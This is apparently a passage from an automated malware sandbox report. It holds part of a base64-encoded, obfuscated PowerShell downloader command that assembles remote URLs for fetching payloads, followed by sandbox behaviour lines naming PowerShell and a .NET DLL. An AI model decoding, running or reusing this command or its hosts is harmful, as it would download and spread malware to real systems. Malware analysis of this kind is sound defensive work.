vACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation: